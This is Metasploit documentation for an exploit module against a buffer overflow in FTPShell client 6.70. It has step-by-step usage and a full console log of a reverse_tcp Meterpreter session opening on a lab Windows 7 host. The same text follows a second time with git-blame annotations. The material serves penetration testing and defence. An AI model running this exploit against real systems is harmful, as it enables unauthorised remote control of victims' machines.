documentation/modules/exploit/windows/ftp/ftpshell_cli_bof.md

## Vulnerable Application

FTPShell client 6.70 (Enterprise edition) is affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code on the target. The vulnerability is caused by improper bounds checking of the PWD command. This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at [ftpshell.com](http://www.ftpshell.com/downloadclient.htm).

## Verification Steps
    1. Install a vulnerable FTPShell client 6.70
    2. Start `msfconsole`
    3. Do `use exploit/windows/ftp/ftpshell_cli_bof`
    4. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
    5. Do `set LHOST ip`
    6. Do `exploit`
    7. Connect to the FTP server using FTPShell client 6.70
    8. Verify the Meterpreter session is opened

## Scenarios

### FTPShell client 6.70 on Windows 7 SP1 x64

```
msf > use exploit/windows/ftp/ftpshell_cli_bof 
msf exploit(windows/ftp/ftpshell_cli_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/ftp/ftpshell_cli_bof) > set LHOST 172.16.106.129 
LHOST => 172.16.106.129
msf exploit(windows/ftp/ftpshell_cli_bof) > exploit 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 172.16.106.129:4444 
[*] Please ask your target(s) to connect to 172.16.106.129:21
[*] Server started.
msf exploit(windows/ftp/ftpshell_cli_bof) > [*] 172.16.106.128 - connected.
[*] 172.16.106.128 - Response: Sending 220 Welcome
[*] 172.16.106.128 - Request: USER anonymous
[*] 172.16.106.128 - Response: sending 331 OK
[*] 172.16.106.128 - Request: PASS anonymous@anon.com
[*] 172.16.106.128 - Response: Sending 230 OK
[*] 172.16.106.128 - Request: PWD
[*] 172.16.106.128 - Request: Sending the malicious response
[*] Sending stage (179779 bytes) to 172.16.106.128
[*] Meterpreter session 1 opened (172.16.106.129:4444 -> 172.16.106.128:49263) at 2018-06-27 11:19:38 -0400

msf exploit(windows/ftp/ftpshell_cli_bof) > sessions 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer        : PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >
```
FTPShell client 6.70 (Enterprise edition) 2018-06-27 16:36:04 +01:00			`## Vulnerable Application`

			`FTPShell client 6.70 (Enterprise edition) is affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code on the target. The vulnerability is caused by improper bounds checking of the PWD command. This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at [ftpshell.com](http://www.ftpshell.com/downloadclient.htm).`

			`## Verification Steps`
			`1. Install a vulnerable FTPShell client 6.70`
			2. Start `msfconsole`
			3. Do `use exploit/windows/ftp/ftpshell_cli_bof`
			4. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
			5. Do `set LHOST ip`
			6. Do `exploit`
spelling fixes on docs 2023-10-10 14:46:18 -04:00			`7. Connect to the FTP server using FTPShell client 6.70`
FTPShell client 6.70 (Enterprise edition) 2018-06-27 16:36:04 +01:00			`8. Verify the Meterpreter session is opened`

			`## Scenarios`

			`### FTPShell client 6.70 on Windows 7 SP1 x64`

			```
			`msf > use exploit/windows/ftp/ftpshell_cli_bof`
			`msf exploit(windows/ftp/ftpshell_cli_bof) > set PAYLOAD windows/meterpreter/reverse_tcp`
			`PAYLOAD => windows/meterpreter/reverse_tcp`
			`msf exploit(windows/ftp/ftpshell_cli_bof) > set LHOST 172.16.106.129`
			`LHOST => 172.16.106.129`
			`msf exploit(windows/ftp/ftpshell_cli_bof) > exploit`
			`[*] Exploit running as background job 0.`

			`[*] Started reverse TCP handler on 172.16.106.129:4444`
			`[*] Please ask your target(s) to connect to 172.16.106.129:21`
			`[*] Server started.`
			`msf exploit(windows/ftp/ftpshell_cli_bof) > [*] 172.16.106.128 - connected.`
			`[*] 172.16.106.128 - Response: Sending 220 Welcome`
			`[*] 172.16.106.128 - Request: USER anonymous`
			`[*] 172.16.106.128 - Response: sending 331 OK`
			`[*] 172.16.106.128 - Request: PASS anonymous@anon.com`
			`[*] 172.16.106.128 - Response: Sending 230 OK`
			`[*] 172.16.106.128 - Request: PWD`
			`[*] 172.16.106.128 - Request: Sending the malicious response`
			`[*] Sending stage (179779 bytes) to 172.16.106.128`
			`[*] Meterpreter session 1 opened (172.16.106.129:4444 -> 172.16.106.128:49263) at 2018-06-27 11:19:38 -0400`

			`msf exploit(windows/ftp/ftpshell_cli_bof) > sessions 1`
			`[*] Starting interaction with 1...`

			`meterpreter > sysinfo`
			`Computer : PC`
			`OS : Windows 7 (Build 7601, Service Pack 1).`
			`Architecture : x64`
			`System Language : en_US`
			`Domain : WORKGROUP`
			`Logged On Users : 1`
			`Meterpreter : x86/windows`
			`meterpreter >`
			```